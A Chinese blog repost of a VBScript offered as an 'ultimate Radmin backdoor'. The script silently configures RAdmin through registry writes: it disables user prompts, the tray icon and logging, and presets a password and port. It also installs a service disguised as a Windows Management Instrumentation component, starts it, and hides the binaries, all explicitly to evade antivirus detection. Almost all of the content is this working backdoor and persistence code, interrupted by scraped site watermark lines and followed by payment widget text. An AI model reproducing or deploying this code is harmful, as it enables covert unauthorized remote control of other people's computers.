利用Vbs脚本实现radmin终极后门

本文介绍了一种通过修改注册表来静默安装并配置RAdmin的方法,实现远程控制功能而不会触发杀毒软件报警。该过程包括创建多个注册表项以调整RAdmin的行为参数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导读:
  在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
  on error resume next
  const HKEY_LOCAL_MACHINE = &H80000002
  strComputer = "."
  Set StdOut = WScript.StdOut
  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
  strComputer &"/root/default:StdRegProv")
  strKeyPath = "SYSTEM/RAdmin"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM/RAdmin/v2.0"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
  oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
  BBS.bitsCN.com网管论坛
  strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
  uBinary = Array(1,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
  uBinary = Array(0,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
  uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
  bitsCN.nET*中国网管博客
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
  uBinary = Array(5,4,0,0) //端口:1029
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
  uBinary = Array(10,0,0,0)
  Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
  strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
  strValueName = "LogFilePath"
  strValue = "c:/logfile.txt"
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
  [bitsCN.Com]
  strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
  strValueName = "Description"
  strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "DisplayName"
  strValue = "Windows Management Instrumentation Player Drivers"
  oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  strValueName = "ImagePath"
  strValue = "c:/windows/system32/Exporer.exe /service"
  oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
  set wshshell=createobject ("wscript.shell")
  a=wshshell.run ("net start WinManageHelp",0)
  b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
  c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
  d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)

本文转自
http://www.bitscn.com/hack/safe/200802/124316.html
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值